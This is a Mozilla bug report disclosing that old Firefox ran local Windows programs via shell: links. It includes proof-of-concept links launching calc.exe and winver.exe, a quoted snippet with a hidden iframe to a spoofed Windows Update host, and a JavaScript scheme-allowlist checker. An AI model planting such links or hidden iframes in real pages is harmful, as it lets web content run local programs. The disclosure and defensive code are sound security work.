Closed Bug 250356 Opened 17 years ago Closed 17 years ago
Mozilla / Firefox will execute local programs in the system32 dir using the shell: code in html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1

-----snip------
center><br><br><img src="nocigar.gif"></center>
<center> <a href="shell:windows\snakeoil.txt">who goes there</a></center>
<iframe src="http://windowsupdate.microsoft.com%2F.http- equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
[customise as you see fit]
<http://www.malware.com/stockpump.html>
------end----------

The code above has interest to me. Even in Mozilla the commands below will work.

<a href=shell:windows\\system32\\calc.exe>1</a>
<a href=shell:windows\system32\calc.exe>2</a>
<a href=shell:windows\system32\winver.exe>4</a>

Just save them to an .html file and run it. The first one with the double quotes was from bugtraq:

Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
<http://seclists.org/lists/bugtraq/2004/Mar/0188.html>

The links below that will run calc as well as winver. It seems it calls windows as a virtual dir because c:\winxp is what I have. I have been playing around to see if cmd.exe will work with it but without luck.

This is what is in the registry.

HKEY_CLASSES_ROOT\Shell

Look in the registry key above. You will find the shell object calls Windows Explorer with a particular set of arguments.

%SystemRoot%\Explorer.exe /e,/idlist,%I,%L

Basically, I have been able to call several programs from the /system32 in Mozilla using the shell: call. This could easily be exploited with a BO if passed to the correct local program.

Reproducible: Always

Steps to Reproduce:
1.<a href=shell:windows\system32\calc.exe>2</a>
2.<a href=shell:windows\system32\winver.exe>4</a>
3.

Actual Results:
After clicking on the links above in XP / Firefox 1.9 the specified applications are launched.

Expected Results:
Mozilla should possibly blacklist the shell: protocol????
Already public and fixed. *** This bug has been marked as a duplicate of 250180 ***
Status: UNCONFIRMED → RESOLVED
Closed: 17 years ago
Resolution: --- → DUPLICATE
thank you for your report, in the future if you could report it to us a day before you mention it to full-disclosure instead of the other way around, that'd be nice. :)
Status: RESOLVED → VERIFIED
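
Added example, not part of the original bug thread and not Mozilla's code: the report asks for shell: to be blacklisted, and this sketch audits href/src targets against an allowlist instead, so an unexpected scheme is rejected by default. The allowlist contents, the function names and the sample markup are assumptions constructed from the links in the report.

```javascript
// Schemes a page is allowed to link to. This list is an assumption for the
// example, not Mozilla's actual policy.
const ALLOWED_SCHEMES = new Set(["http", "https", "ftp", "mailto"]);

// Return the lowercased scheme of a URL string, or null for a relative reference.
function schemeOf(url) {
  // URL parsers drop embedded tab/CR/LF and surrounding whitespace before
  // reading the scheme, so "sh\nell:" must be treated as "shell:".
  const cleaned = url.replace(/[\t\r\n]/g, "").trim();
  const m = /^([A-Za-z][A-Za-z0-9+.\-]*):/.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Collect href/src values from markup: double-quoted, single-quoted, and the
// unquoted form used by the links in the report.
function extractTargets(html) {
  const re = /\b(?:href|src)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    out.push(m[1] || m[2] || m[3] || "");
  }
  return out;
}

// Classify every target: relative references and allowlisted schemes pass,
// anything else (shell:, or a scheme nobody thought of) is flagged.
function auditLinks(html) {
  return extractTargets(html).map((target) => {
    const scheme = schemeOf(target);
    const allowed = scheme === null || ALLOWED_SCHEMES.has(scheme);
    return { target, scheme, allowed };
  });
}

// Constructed sample: the first link is from the report; the others are variants.
const SAMPLE = String.raw`
<a href=shell:windows\system32\calc.exe>2</a>
<a href="SHELL:windows\system32\winver.exe">4</a>
<a href="https://example.org/page">ok</a>
<a href='docs/readme.html'>relative</a>
<img src="nocigar.gif">
`;

for (const r of auditLinks(SAMPLE)) {
  console.log(r.allowed ? "allow" : "BLOCK", r.scheme, r.target);
}
```

A denylist containing only shell would block the same two links, but it would pass any other externally handled scheme that was not listed.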